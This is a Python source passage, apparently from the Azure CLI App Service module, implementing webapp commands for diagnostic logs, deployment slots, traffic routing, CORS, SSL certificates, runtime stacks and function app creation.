site = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
if not site:
raise CLIError("'{}' app doesn't exist".format(name))
    url = site.enabled_host_names[0]  # picks the custom domain URL in case a domain is assigned
ssl_host = next((h for h in site.host_name_ssl_states
if h.ssl_state != SslState.disabled), None)
return ('https' if ssl_host else 'http') + '://' + url
# TODO: expose new blob support
def config_diagnostics(cmd, resource_group_name, name, level=None,
application_logging=None, web_server_logging=None,
docker_container_logging=None, detailed_error_messages=None,
failed_request_tracing=None, slot=None):
from azure.mgmt.web.models import (FileSystemApplicationLogsConfig, ApplicationLogsConfig,
AzureBlobStorageApplicationLogsConfig, SiteLogsConfig,
HttpLogsConfig, FileSystemHttpLogsConfig,
EnabledConfig)
client = web_client_factory(cmd.cli_ctx)
# TODO: ensure we call get_site only once
site = client.web_apps.get(resource_group_name, name)
if not site:
raise CLIError("'{}' app doesn't exist".format(name))
location = site.location
application_logs = None
if application_logging:
fs_log = None
blob_log = None
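        # 'off' forces the level to False; otherwise an unspecified level defaults to True (enabled)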
level = level if application_logging != 'off' else False
level = True if level is None else level
if application_logging in ['filesystem', 'off']:
fs_log = FileSystemApplicationLogsConfig(level=level)
if application_logging in ['azureblobstorage', 'off']:
blob_log = AzureBlobStorageApplicationLogsConfig(level=level, retention_in_days=3,
sas_url=None)
application_logs = ApplicationLogsConfig(file_system=fs_log,
azure_blob_storage=blob_log)
http_logs = None
server_logging_option = web_server_logging or docker_container_logging
if server_logging_option:
        # TODO: az blob storage log config currently not in use, will be implemented later.
        # Tracked as Issue: #4764 on GitHub
filesystem_log_config = None
turned_on = server_logging_option != 'off'
if server_logging_option in ['filesystem', 'off']:
            # 100 MB max log size, 3-day retention; these values are hard-coded, matching the portal defaults
filesystem_log_config = FileSystemHttpLogsConfig(retention_in_mb=100, retention_in_days=3,
enabled=turned_on)
http_logs = HttpLogsConfig(file_system=filesystem_log_config, azure_blob_storage=None)
detailed_error_messages_logs = (None if detailed_error_messages is None
else EnabledConfig(enabled=detailed_error_messages))
failed_request_tracing_logs = (None if failed_request_tracing is None
else EnabledConfig(enabled=failed_request_tracing))
site_log_config = SiteLogsConfig(location=location,
application_logs=application_logs,
http_logs=http_logs,
failed_requests_tracing=failed_request_tracing_logs,
detailed_error_messages=detailed_error_messages_logs)
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_diagnostic_logs_config',
slot, site_log_config)
def show_diagnostic_settings(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get_diagnostic_logs_configuration', slot)
def show_deployment_log(cmd, resource_group, name, slot=None, deployment_id=None):
import urllib3
import requests
scm_url = _get_scm_url(cmd, resource_group, name, slot)
username, password = _get_site_credential(cmd.cli_ctx, resource_group, name, slot)
headers = urllib3.util.make_headers(basic_auth='{}:{}'.format(username, password))
deployment_log_url = ''
if deployment_id:
deployment_log_url = '{}/api/deployments/{}/log'.format(scm_url, deployment_id)
else:
deployments_url = '{}/api/deployments/'.format(scm_url)
response = requests.get(deployments_url, headers=headers)
if response.status_code != 200:
raise CLIError("Failed to connect to '{}' with status code '{}' and reason '{}'".format(
deployments_url, response.status_code, response.reason))
sorted_logs = sorted(
response.json(),
key=lambda x: x['start_time'],
reverse=True
)
if sorted_logs and sorted_logs[0]:
deployment_log_url = sorted_logs[0].get('log_url', '')
if deployment_log_url:
response = requests.get(deployment_log_url, headers=headers)
if response.status_code != 200:
raise CLIError("Failed to connect to '{}' with status code '{}' and reason '{}'".format(
deployment_log_url, response.status_code, response.reason))
return response.json()
return []
def list_deployment_logs(cmd, resource_group, name, slot=None):
scm_url = _get_scm_url(cmd, resource_group, name, slot)
deployment_log_url = '{}/api/deployments/'.format(scm_url)
username, password = _get_site_credential(cmd.cli_ctx, resource_group, name, slot)
import urllib3
headers = urllib3.util.make_headers(basic_auth='{}:{}'.format(username, password))
import requests
response = requests.get(deployment_log_url, headers=headers)
if response.status_code != 200:
raise CLIError("Failed to connect to '{}' with status code '{}' and reason '{}'".format(
scm_url, response.status_code, response.reason))
return response.json() or []
def config_slot_auto_swap(cmd, resource_group_name, webapp, slot, auto_swap_slot=None, disable=None):
client = web_client_factory(cmd.cli_ctx)
site_config = client.web_apps.get_configuration_slot(resource_group_name, webapp, slot)
site_config.auto_swap_slot_name = '' if disable else (auto_swap_slot or 'production')
return _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp, 'update_configuration', slot, site_config)
def list_slots(cmd, resource_group_name, webapp):
client = web_client_factory(cmd.cli_ctx)
slots = list(client.web_apps.list_slots(resource_group_name, webapp))
for slot in slots:
slot.name = slot.name.split('/')[-1]
setattr(slot, 'app_service_plan', parse_resource_id(slot.server_farm_id)['name'])
del slot.server_farm_id
return slots
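# action='swap' performs the swap; 'preview' applies only the configuration phase of the swap;
# any other action resets the configuration changes applied by a preview.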
def swap_slot(cmd, resource_group_name, webapp, slot, target_slot=None, preserve_vnet=None, action='swap'):
client = web_client_factory(cmd.cli_ctx)
# Default isPreserveVnet to 'True' if preserve_vnet is 'None'
isPreserveVnet = preserve_vnet if preserve_vnet is not None else 'true'
    # conversion from string to boolean
isPreserveVnet = bool(isPreserveVnet == 'true')
CsmSlotEntity = cmd.get_models('CsmSlotEntity')
slot_swap_entity = CsmSlotEntity(target_slot=target_slot or 'production', preserve_vnet=isPreserveVnet)
if action == 'swap':
poller = client.web_apps.begin_swap_slot(resource_group_name, webapp, slot, slot_swap_entity)
return poller
if action == 'preview':
if slot is None:
result = client.web_apps.apply_slot_config_to_production(resource_group_name, webapp, slot_swap_entity)
else:
result = client.web_apps.apply_slot_configuration_slot(resource_group_name, webapp, slot, slot_swap_entity)
return result
    # for any other action, revert the slot configuration changes applied during a swap preview
if target_slot is None:
client.web_apps.reset_production_slot_config(resource_group_name, webapp)
else:
client.web_apps.reset_slot_configuration_slot(resource_group_name, webapp, target_slot)
return None
def delete_slot(cmd, resource_group_name, webapp, slot):
client = web_client_factory(cmd.cli_ctx)
# TODO: once swagger finalized, expose other parameters like: delete_all_slots, etc...
client.web_apps.delete_slot(resource_group_name, webapp, slot)
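# distribution is a list of 'slot=percentage' pairs, e.g. ['staging=25'] routes 25% of traffic to the 'staging' slot.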
def set_traffic_routing(cmd, resource_group_name, name, distribution):
RampUpRule = cmd.get_models('RampUpRule')
client = web_client_factory(cmd.cli_ctx)
site = client.web_apps.get(resource_group_name, name)
if not site:
raise CLIError("'{}' app doesn't exist".format(name))
configs = get_site_configs(cmd, resource_group_name, name)
host_name_split = site.default_host_name.split('.', 1)
host_name_suffix = '.' + host_name_split[1]
host_name_val = host_name_split[0]
configs.experiments.ramp_up_rules = []
for r in distribution:
slot, percentage = r.split('=')
action_host_name_slot = host_name_val + "-" + slot
configs.experiments.ramp_up_rules.append(RampUpRule(action_host_name=action_host_name_slot + host_name_suffix,
reroute_percentage=float(percentage),
name=slot))
_generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_configuration', None, configs)
return configs.experiments.ramp_up_rules
def show_traffic_routing(cmd, resource_group_name, name):
configs = get_site_configs(cmd, resource_group_name, name)
return configs.experiments.ramp_up_rules
def clear_traffic_routing(cmd, resource_group_name, name):
set_traffic_routing(cmd, resource_group_name, name, [])
def add_cors(cmd, resource_group_name, name, allowed_origins, slot=None):
from azure.mgmt.web.models import CorsSettings
configs = get_site_configs(cmd, resource_group_name, name, slot)
if not configs.cors:
configs.cors = CorsSettings()
configs.cors.allowed_origins = (configs.cors.allowed_origins or []) + allowed_origins
result = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_configuration', slot, configs)
return result.cors
def remove_cors(cmd, resource_group_name, name, allowed_origins, slot=None):
configs = get_site_configs(cmd, resource_group_name, name, slot)
if configs.cors:
if allowed_origins:
configs.cors.allowed_origins = [x for x in (configs.cors.allowed_origins or []) if x not in allowed_origins]
else:
configs.cors.allowed_origins = []
configs = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_configuration', slot, configs)
return configs.cors
def show_cors(cmd, resource_group_name, name, slot=None):
configs = get_site_configs(cmd, resource_group_name, name, slot)
return configs.cors
def get_streaming_log(cmd, resource_group_name, name, provider=None, slot=None):
scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
streaming_url = scm_url + '/logstream'
if provider:
streaming_url += ('/' + provider.lstrip('/'))
user, password = _get_site_credential(cmd.cli_ctx, resource_group_name, name, slot)
t = threading.Thread(target=_get_log, args=(streaming_url, user, password))
t.daemon = True
t.start()
while True:
time.sleep(100) # so that ctrl+c can stop the command
def download_historical_logs(cmd, resource_group_name, name, log_file=None, slot=None):
scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
url = scm_url.rstrip('/') + '/dump'
user_name, password = _get_site_credential(cmd.cli_ctx, resource_group_name, name, slot)
_get_log(url, user_name, password, log_file)
logger.warning('Downloaded logs to %s', log_file)
def _get_site_credential(cli_ctx, resource_group_name, name, slot=None):
creds = _generic_site_operation(cli_ctx, resource_group_name, name, 'begin_list_publishing_credentials', slot)
creds = creds.result()
return (creds.publishing_user_name, creds.publishing_password)
def _get_log(url, user_name, password, log_file=None):
import urllib3
try:
import urllib3.contrib.pyopenssl
urllib3.contrib.pyopenssl.inject_into_urllib3()
except ImportError:
pass
http = get_pool_manager(url)
headers = urllib3.util.make_headers(basic_auth='{0}:{1}'.format(user_name, password))
r = http.request(
'GET',
url,
headers=headers,
preload_content=False
)
if r.status != 200:
raise CLIError("Failed to connect to '{}' with status code '{}' and reason '{}'".format(
url, r.status, r.reason))
if log_file: # download logs
with open(log_file, 'wb') as f:
while True:
data = r.read(1024)
if not data:
break
f.write(data)
else: # streaming
std_encoding = sys.stdout.encoding
for chunk in r.stream():
if chunk:
                # Extra encode() and decode() for stdouts that do not support 'utf-8'
logger.warning(chunk.decode(encoding='utf-8', errors='replace')
.encode(std_encoding, errors='replace')
.decode(std_encoding, errors='replace')
.rstrip('\n\r')) # each line of log has CRLF.
r.release_conn()
def upload_ssl_cert(cmd, resource_group_name, name, certificate_password, certificate_file, slot=None):
Certificate = cmd.get_models('Certificate')
client = web_client_factory(cmd.cli_ctx)
webapp = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
    with open(certificate_file, 'rb') as cert_file:
        cert_contents = cert_file.read()
hosting_environment_profile_param = (webapp.hosting_environment_profile.name
if webapp.hosting_environment_profile else '')
thumb_print = _get_cert(certificate_password, certificate_file)
cert_name = _generate_cert_name(thumb_print, hosting_environment_profile_param,
webapp.location, resource_group_name)
cert = Certificate(password=certificate_password, pfx_blob=cert_contents,
location=webapp.location, server_farm_id=webapp.server_farm_id)
return client.certificates.create_or_update(resource_group_name, cert_name, cert)
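# e.g. '<thumbprint>_<ase-name>_westus_my-resource-group'; the ASE segment is empty for apps outside an App Service Environment.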
def _generate_cert_name(thumb_print, hosting_environment, location, resource_group_name):
return "%s_%s_%s_%s" % (thumb_print, hosting_environment, location, resource_group_name)
def _get_cert(certificate_password, certificate_file):
''' Decrypts the .pfx file '''
    with open(certificate_file, 'rb') as f:
        p12 = OpenSSL.crypto.load_pkcs12(f.read(), certificate_password)
cert = p12.get_certificate()
digest_algorithm = 'sha1'
thumbprint = cert.digest(digest_algorithm).decode("utf-8").replace(':', '')
return thumbprint
def list_ssl_certs(cmd, resource_group_name):
client = web_client_factory(cmd.cli_ctx)
return client.certificates.list_by_resource_group(resource_group_name)
def show_ssl_cert(cmd, resource_group_name, certificate_name):
client = web_client_factory(cmd.cli_ctx)
return client.certificates.get(resource_group_name, certificate_name)
def delete_ssl_cert(cmd, resource_group_name, certificate_thumbprint):
client = web_client_factory(cmd.cli_ctx)
webapp_certs = client.certificates.list_by_resource_group(resource_group_name)
for webapp_cert in webapp_certs:
if webapp_cert.thumbprint == certificate_thumbprint:
return client.certificates.delete(resource_group_name, webapp_cert.name)
raise CLIError("Certificate for thumbprint '{}' not found".format(certificate_thumbprint))
def import_ssl_cert(cmd, resource_group_name, name, key_vault, key_vault_certificate_name):
Certificate = cmd.get_models('Certificate')
client = web_client_factory(cmd.cli_ctx)
webapp = client.web_apps.get(resource_group_name, name)
if not webapp:
raise CLIError("'{}' app doesn't exist in resource group {}".format(name, resource_group_name))
server_farm_id = webapp.server_farm_id
location = webapp.location
kv_id = None
if not is_valid_resource_id(key_vault):
kv_client = get_mgmt_service_client(cmd.cli_ctx, ResourceType.MGMT_KEYVAULT)
key_vaults = kv_client.vaults.list_by_subscription()
for kv in key_vaults:
if key_vault == kv.name:
kv_id = kv.id
break
else:
kv_id = key_vault
if kv_id is None:
kv_msg = 'The Key Vault {0} was not found in the subscription in context. ' \
'If your Key Vault is in a different subscription, please specify the full Resource ID: ' \
'\naz .. ssl import -n {1} -g {2} --key-vault-certificate-name {3} ' \
'--key-vault /subscriptions/[sub id]/resourceGroups/[rg]/providers/Microsoft.KeyVault/' \
'vaults/{0}'.format(key_vault, name, resource_group_name, key_vault_certificate_name)
logger.warning(kv_msg)
return
kv_id_parts = parse_resource_id(kv_id)
kv_name = kv_id_parts['name']
kv_resource_group_name = kv_id_parts['resource_group']
kv_subscription = kv_id_parts['subscription']
    # If in the public cloud, check whether the certificate is an app service certificate, in the same or a different
    # subscription
kv_secret_name = None
cloud_type = cmd.cli_ctx.cloud.name
from azure.cli.core.commands.client_factory import get_subscription_id
subscription_id = get_subscription_id(cmd.cli_ctx)
if cloud_type.lower() == PUBLIC_CLOUD.lower():
if kv_subscription.lower() != subscription_id.lower():
diff_subscription_client = get_mgmt_service_client(cmd.cli_ctx, ResourceType.MGMT_APPSERVICE,
subscription_id=kv_subscription)
ascs = diff_subscription_client.app_service_certificate_orders.list()
else:
ascs = client.app_service_certificate_orders.list()
kv_secret_name = None
for asc in ascs:
if asc.name == key_vault_certificate_name:
kv_secret_name = asc.certificates[key_vault_certificate_name].key_vault_secret_name
    # if kv_secret_name is not populated, this is not an App Service Certificate; fall back to the Key Vault certificate name
if not kv_secret_name:
kv_secret_name = key_vault_certificate_name
cert_name = '{}-{}-{}'.format(resource_group_name, kv_name, key_vault_certificate_name)
lnk = 'https://azure.github.io/AppService/2016/05/24/Deploying-Azure-Web-App-Certificate-through-Key-Vault.html'
lnk_msg = 'Find more details here: {}'.format(lnk)
if not _check_service_principal_permissions(cmd, kv_resource_group_name, kv_name, kv_subscription):
logger.warning('Unable to verify Key Vault permissions.')
logger.warning('You may need to grant Microsoft.Azure.WebSites service principal the Secret:Get permission')
logger.warning(lnk_msg)
kv_cert_def = Certificate(location=location, key_vault_id=kv_id, password='',
key_vault_secret_name=kv_secret_name, server_farm_id=server_farm_id)
return client.certificates.create_or_update(name=cert_name, resource_group_name=resource_group_name,
certificate_envelope=kv_cert_def)
def create_managed_ssl_cert(cmd, resource_group_name, name, hostname, slot=None):
Certificate = cmd.get_models('Certificate')
hostname = hostname.lower()
client = web_client_factory(cmd.cli_ctx)
webapp = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
if not webapp:
slot_text = "Deployment slot {} in ".format(slot) if slot else ''
raise CLIError("{0}app {1} doesn't exist in resource group {2}".format(slot_text, name, resource_group_name))
parsed_plan_id = parse_resource_id(webapp.server_farm_id)
plan_info = client.app_service_plans.get(parsed_plan_id['resource_group'], parsed_plan_id['name'])
if plan_info.sku.tier.upper() == 'FREE' or plan_info.sku.tier.upper() == 'SHARED':
        raise CLIError('Managed Certificates are not supported on the Free and Shared tiers.')
if not _verify_hostname_binding(cmd, resource_group_name, name, hostname, slot):
slot_text = " --slot {}".format(slot) if slot else ""
raise CLIError("Hostname (custom domain) '{0}' is not registered with {1}. "
"Use 'az webapp config hostname add --resource-group {2} "
"--webapp-name {1}{3} --hostname {0}' "
"to register the hostname.".format(hostname, name, resource_group_name, slot_text))
server_farm_id = webapp.server_farm_id
location = webapp.location
easy_cert_def = Certificate(location=location, canonical_name=hostname,
server_farm_id=server_farm_id, password='')
# TODO: Update manual polling to use LongRunningOperation once backend API & new SDK supports polling
try:
return client.certificates.create_or_update(name=hostname, resource_group_name=resource_group_name,
certificate_envelope=easy_cert_def)
except Exception as ex:
poll_url = ex.response.headers['Location'] if 'Location' in ex.response.headers else None
if ex.response.status_code == 202 and poll_url:
r = send_raw_request(cmd.cli_ctx, method='get', url=poll_url)
poll_timeout = time.time() + 60 * 2 # 2 minute timeout
while r.status_code != 200 and time.time() < poll_timeout:
time.sleep(5)
r = send_raw_request(cmd.cli_ctx, method='get', url=poll_url)
if r.status_code == 200:
try:
return r.json()
except ValueError:
return r.text
logger.warning("Managed Certificate creation in progress. Please use the command "
"'az webapp config ssl show -g %s --certificate-name %s' "
" to view your certificate once it is created", resource_group_name, hostname)
return
raise CLIError(ex)
def _check_service_principal_permissions(cmd, resource_group_name, key_vault_name, key_vault_subscription):
from azure.cli.command_modules.role._client_factory import _graph_client_factory
from azure.graphrbac.models import GraphErrorException
from azure.cli.core.commands.client_factory import get_subscription_id
subscription = get_subscription_id(cmd.cli_ctx)
# Cannot check if key vault is in another subscription
if subscription != key_vault_subscription:
return False
kv_client = get_mgmt_service_client(cmd.cli_ctx, ResourceType.MGMT_KEYVAULT)
vault = kv_client.vaults.get(resource_group_name=resource_group_name, vault_name=key_vault_name)
# Check for Microsoft.Azure.WebSites app registration
AZURE_PUBLIC_WEBSITES_APP_ID = 'abfa0a7c-a6b6-4736-8310-5855508787cd'
AZURE_GOV_WEBSITES_APP_ID = '6a02c803-dafd-4136-b4c3-5a6f318b4714'
graph_sp_client = _graph_client_factory(cmd.cli_ctx).service_principals
for policy in vault.properties.access_policies:
try:
sp = graph_sp_client.get(policy.object_id)
if sp.app_id == AZURE_PUBLIC_WEBSITES_APP_ID or sp.app_id == AZURE_GOV_WEBSITES_APP_ID:
for perm in policy.permissions.secrets:
if perm == "Get":
return True
except GraphErrorException:
pass # Lookup will fail for non service principals (users, groups, etc.)
return False
def _update_host_name_ssl_state(cmd, resource_group_name, webapp_name, webapp,
host_name, ssl_state, thumbprint, slot=None):
Site, HostNameSslState = cmd.get_models('Site', 'HostNameSslState')
updated_webapp = Site(host_name_ssl_states=[HostNameSslState(name=host_name,
ssl_state=ssl_state,
thumbprint=thumbprint,
to_update=True)],
location=webapp.location, tags=webapp.tags)
return _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name, 'begin_create_or_update',
slot, updated_webapp)
def _update_ssl_binding(cmd, resource_group_name, name, certificate_thumbprint, ssl_type, slot=None):
client = web_client_factory(cmd.cli_ctx)
webapp = client.web_apps.get(resource_group_name, name)
if not webapp:
raise ResourceNotFoundError("'{}' app doesn't exist".format(name))
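    # certificates usually live in the plan's resource group; fall back to the app's resource group if not found there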
cert_resource_group_name = parse_resource_id(webapp.server_farm_id)['resource_group']
webapp_certs = client.certificates.list_by_resource_group(cert_resource_group_name)
found_cert = None
for webapp_cert in webapp_certs:
if webapp_cert.thumbprint == certificate_thumbprint:
found_cert = webapp_cert
if not found_cert:
webapp_certs = client.certificates.list_by_resource_group(resource_group_name)
for webapp_cert in webapp_certs:
if webapp_cert.thumbprint == certificate_thumbprint:
found_cert = webapp_cert
if found_cert:
if len(found_cert.host_names) == 1 and not found_cert.host_names[0].startswith('*'):
return _update_host_name_ssl_state(cmd, resource_group_name, name, webapp,
found_cert.host_names[0], ssl_type,
certificate_thumbprint, slot)
query_result = list_hostnames(cmd, resource_group_name, name, slot)
hostnames_in_webapp = [x.name.split('/')[-1] for x in query_result]
to_update = _match_host_names_from_cert(found_cert.host_names, hostnames_in_webapp)
for h in to_update:
_update_host_name_ssl_state(cmd, resource_group_name, name, webapp,
h, ssl_type, certificate_thumbprint, slot)
return show_webapp(cmd, resource_group_name, name, slot)
raise ResourceNotFoundError("Certificate for thumbprint '{}' not found.".format(certificate_thumbprint))
def bind_ssl_cert(cmd, resource_group_name, name, certificate_thumbprint, ssl_type, slot=None):
SslState = cmd.get_models('SslState')
return _update_ssl_binding(cmd, resource_group_name, name, certificate_thumbprint,
SslState.sni_enabled if ssl_type == 'SNI' else SslState.ip_based_enabled, slot)
def unbind_ssl_cert(cmd, resource_group_name, name, certificate_thumbprint, slot=None):
SslState = cmd.get_models('SslState')
return _update_ssl_binding(cmd, resource_group_name, name,
certificate_thumbprint, SslState.disabled, slot)
def _match_host_names_from_cert(hostnames_from_cert, hostnames_in_webapp):
    # the goal is to match '*.foo.com' with host names like 'admin.foo.com', 'logs.foo.com', etc.
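    # e.g. hostnames_from_cert=['*.foo.com'], hostnames_in_webapp=['admin.foo.com', 'www.bar.com'] -> {'admin.foo.com'}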
matched = set()
for hostname in hostnames_from_cert:
if hostname.startswith('*'):
for h in hostnames_in_webapp:
if hostname[hostname.find('.'):] == h[h.find('.'):]:
matched.add(h)
elif hostname in hostnames_in_webapp:
matched.add(hostname)
return matched
# helper class that handles runtime stacks in formats like 'node|6.1', 'php|5.5'
class _StackRuntimeHelper:
def __init__(self, cmd, client, linux=False):
self._cmd = cmd
self._client = client
self._linux = linux
self._stacks = []
@staticmethod
def remove_delimiters(runtime):
import re
# delimiters allowed: '|', ':'
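        # e.g. 'node:12' -> 'node|12'; 'php|7.4' is returned unchanged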
if '|' in runtime:
runtime = re.split('[|]', runtime)
elif ':' in runtime:
runtime = re.split('[:]', runtime)
else:
runtime = [runtime]
return '|'.join(filter(None, runtime))
def resolve(self, display_name):
self._load_stacks_hardcoded()
return next((s for s in self._stacks if s['displayName'].lower() == display_name.lower()),
None)
@property
def stacks(self):
self._load_stacks_hardcoded()
return self._stacks
@staticmethod
def update_site_config(stack, site_config, cmd=None):
for k, v in stack['configs'].items():
setattr(site_config, k, v)
return site_config
@staticmethod
def update_site_appsettings(cmd, stack, site_config):
NameValuePair = cmd.get_models('NameValuePair')
if site_config.app_settings is None:
site_config.app_settings = []
for k, v in stack['configs'].items():
already_in_appsettings = False
for app_setting in site_config.app_settings:
if app_setting.name == k:
already_in_appsettings = True
app_setting.value = v
if not already_in_appsettings:
site_config.app_settings.append(NameValuePair(name=k, value=v))
return site_config
def _load_stacks_hardcoded(self):
if self._stacks:
return
result = []
if self._linux:
result = get_file_json(RUNTIME_STACKS)['linux']
for r in result:
r['setter'] = _StackRuntimeHelper.update_site_config
else: # Windows stacks
result = get_file_json(RUNTIME_STACKS)['windows']
for r in result:
r['setter'] = (_StackRuntimeHelper.update_site_appsettings if 'node' in
r['displayName'] else _StackRuntimeHelper.update_site_config)
self._stacks = result
    # Currently using hardcoded values instead of this function. This function calls the stacks API;
    # the stacks API is only updated with Antares deployments, which are infrequent
    # and don't line up with the stacks EOL schedule.
def _load_stacks(self):
if self._stacks:
return
os_type = ('Linux' if self._linux else 'Windows')
raw_stacks = self._client.provider.get_available_stacks(os_type_selected=os_type, raw=True)
bytes_value = raw_stacks._get_next().content # pylint: disable=protected-access
json_value = bytes_value.decode('utf8')
json_stacks = json.loads(json_value)
stacks = json_stacks['value']
result = []
if self._linux:
for properties in [(s['properties']) for s in stacks]:
for major in properties['majorVersions']:
default_minor = next((m for m in (major['minorVersions'] or []) if m['isDefault']),
None)
result.append({
'displayName': (default_minor['runtimeVersion']
if default_minor else major['runtimeVersion'])
})
else: # Windows stacks
config_mappings = {
'node': 'WEBSITE_NODE_DEFAULT_VERSION',
'python': 'python_version',
'php': 'php_version',
'aspnet': 'net_framework_version'
}
            # get all stack versions except 'java'
for stack in stacks:
if stack['name'] not in config_mappings:
continue
name, properties = stack['name'], stack['properties']
for major in properties['majorVersions']:
default_minor = next((m for m in (major['minorVersions'] or []) if m['isDefault']),
None)
result.append({
'displayName': name + '|' + major['displayVersion'],
'configs': {
config_mappings[name]: (default_minor['runtimeVersion']
if default_minor else major['runtimeVersion'])
}
})
# deal with java, which pairs with java container version
java_stack = next((s for s in stacks if s['name'] == 'java'))
java_container_stack = next((s for s in stacks if s['name'] == 'javaContainers'))
for java_version in java_stack['properties']['majorVersions']:
for fx in java_container_stack['properties']['frameworks']:
for fx_version in fx['majorVersions']:
result.append({
'displayName': 'java|{}|{}|{}'.format(java_version['displayVersion'],
fx['display'],
fx_version['displayVersion']),
'configs': {
'java_version': java_version['runtimeVersion'],
'java_container': fx['name'],
'java_container_version': fx_version['runtimeVersion']
}
})
for r in result:
r['setter'] = (_StackRuntimeHelper.update_site_appsettings if 'node' in
r['displayName'] else _StackRuntimeHelper.update_site_config)
self._stacks = result
def get_app_insights_key(cli_ctx, resource_group, name):
appinsights_client = get_mgmt_service_client(cli_ctx, ApplicationInsightsManagementClient)
appinsights = appinsights_client.components.get(resource_group, name)
if appinsights is None or appinsights.instrumentation_key is None:
raise CLIError("App Insights {} under resource group {} was not found.".format(name, resource_group))
return appinsights.instrumentation_key
def create_functionapp_app_service_plan(cmd, resource_group_name, name, is_linux, sku, number_of_workers=None,
max_burst=None, location=None, tags=None, zone_redundant=False):
SkuDescription, AppServicePlan = cmd.get_models('SkuDescription', 'AppServicePlan')
sku = _normalize_sku(sku)
tier = get_sku_name(sku)
client = web_client_factory(cmd.cli_ctx)
if location is None:
location = _get_location_from_resource_group(cmd.cli_ctx, resource_group_name)
sku_def = SkuDescription(tier=tier, name=sku, capacity=number_of_workers)
plan_def = AppServicePlan(location=location, tags=tags, sku=sku_def,
reserved=(is_linux or None), maximum_elastic_worker_count=max_burst,
hyper_v=None, name=name)
if zone_redundant:
_enable_zone_redundant(plan_def, sku_def, number_of_workers)
return client.app_service_plans.begin_create_or_update(resource_group_name, name, plan_def)
def is_plan_consumption(cmd, plan_info):
SkuDescription, AppServicePlan = cmd.get_models('SkuDescription', 'AppServicePlan')
if isinstance(plan_info, AppServicePlan):
if isinstance(plan_info.sku, SkuDescription):
return plan_info.sku.tier.lower() == 'dynamic'
return False
def is_plan_elastic_premium(cmd, plan_info):
SkuDescription, AppServicePlan = cmd.get_models('SkuDescription', 'AppServicePlan')
if isinstance(plan_info, AppServicePlan):
if isinstance(plan_info.sku, SkuDescription):
return plan_info.sku.tier == 'ElasticPremium'
return False
def create_functionapp(cmd, resource_group_name, name, storage_account, plan=None,
os_type=None, functions_version=None, runtime=None, runtime_version=None,
consumption_plan_location=None, app_insights=None, app_insights_key=None,
disable_app_insights=None, deployment_source_url=None,
deployment_source_branch='master', deployment_local_git=None,
docker_registry_server_password=None, docker_registry_server_user=None,
deployment_container_image_name=None, tags=None, assign_identities=None,
role='Contributor', scope=None, vnet=None, subnet=None):
# pylint: disable=too-many-statements, too-many-branches
if functions_version is None:
logger.warning("No functions version specified so defaulting to 3. In the future, specifying a version will "
"be required. To create a 3.x function you would pass in the flag `--functions-version 3`")
functions_version = '3'
if deployment_source_url and deployment_local_git:
raise CLIError('usage error: --deployment-source-url <url> | --deployment-local-git')
if bool(plan) == bool(consumption_plan_location):
raise CLIError("usage error: --plan NAME_OR_ID | --consumption-plan-location LOCATION")
from azure.mgmt.web.models import Site
SiteConfig, NameValuePair = cmd.get_models('SiteConfig', 'NameValuePair')
docker_registry_server_url = parse_docker_image_name(deployment_container_image_name)
disable_app_insights = (disable_app_insights == "true")
site_config = SiteConfig(app_settings=[])
client = web_client_factory(cmd.cli_ctx)
if vnet or subnet:
if plan:
if is_valid_resource_id(plan):
parse_result = parse_resource_id(plan)
plan_info = client.app_service_plans.get(parse_result['resource_group'], parse_result['name'])
else:
plan_info = client.app_service_plans.get(resource_group_name, plan)
webapp_location = plan_info.location
else:
webapp_location = consumption_plan_location
subnet_info = _get_subnet_info(cmd=cmd,
resource_group_name=resource_group_name,
subnet=subnet,
vnet=vnet)
_validate_vnet_integration_location(cmd=cmd, webapp_location=webapp_location,
subnet_resource_group=subnet_info["resource_group_name"],
vnet_name=subnet_info["vnet_name"])
_vnet_delegation_check(cmd, subnet_subscription_id=subnet_info["subnet_subscription_id"],
vnet_resource_group=subnet_info["resource_group_name"],
vnet_name=subnet_info["vnet_name"],
subnet_name=subnet_info["subnet_name"])
site_config.vnet_route_all_enabled = True
subnet_resource_id = subnet_info["subnet_resource_id"]
else:
subnet_resource_id = None
functionapp_def = Site(location=None, site_config=site_config, tags=tags,
virtual_network_subnet_id=subnet_resource_id)
KEYS = FUNCTIONS_STACKS_API_KEYS()
plan_info = None
if runtime is not None:
runtime = runtime.lower()
if consumption_plan_location:
locations = list_consumption_locations(cmd)
location = next((loc for loc in locations if loc['name'].lower() == consumption_plan_location.lower()), None)
if location is None:
raise CLIError("Location is invalid. Use: az functionapp list-consumption-locations")
functionapp_def.location = consumption_plan_location
functionapp_def.kind = 'functionapp'
# if os_type is None, the os type is windows
is_linux = os_type and os_type.lower() == 'linux'
else: # apps with SKU based plan
if is_valid_resource_id(plan):
parse_result = parse_resource_id(plan)
plan_info = client.app_service_plans.get(parse_result['resource_group'], parse_result['name'])
else:
plan_info = client.app_service_plans.get(resource_group_name, plan)
if not plan_info:
raise CLIError("The plan '{}' doesn't exist".format(plan))
location = plan_info.location
is_linux = plan_info.reserved
functionapp_def.server_farm_id = plan
functionapp_def.location = location
if functions_version == '2' and functionapp_def.location in FUNCTIONS_NO_V2_REGIONS:
raise CLIError("2.x functions are not supported in this region. To create a 3.x function, "
"pass in the flag '--functions-version 3'")
if is_linux and not runtime and (consumption_plan_location or not deployment_container_image_name):
raise CLIError(
"usage error: --runtime RUNTIME required for linux functions apps without custom image.")
runtime_stacks_json = _load_runtime_stacks_json_functionapp(is_linux)
if runtime is None and runtime_version is not None:
raise CLIError('Must specify --runtime to use --runtime-version')
# get the matching runtime stack object
runtime_json = _get_matching_runtime_json_functionapp(runtime_stacks_json, runtime if runtime else 'dotnet')
if not runtime_json:
# no matching runtime for os
os_string = "linux" if is_linux else "windows"
supported_runtimes = list(map(lambda x: x[KEYS.NAME], runtime_stacks_json))
raise CLIError("usage error: Currently supported runtimes (--runtime) in {} function apps are: {}."
.format(os_string, ', '.join(supported_runtimes)))
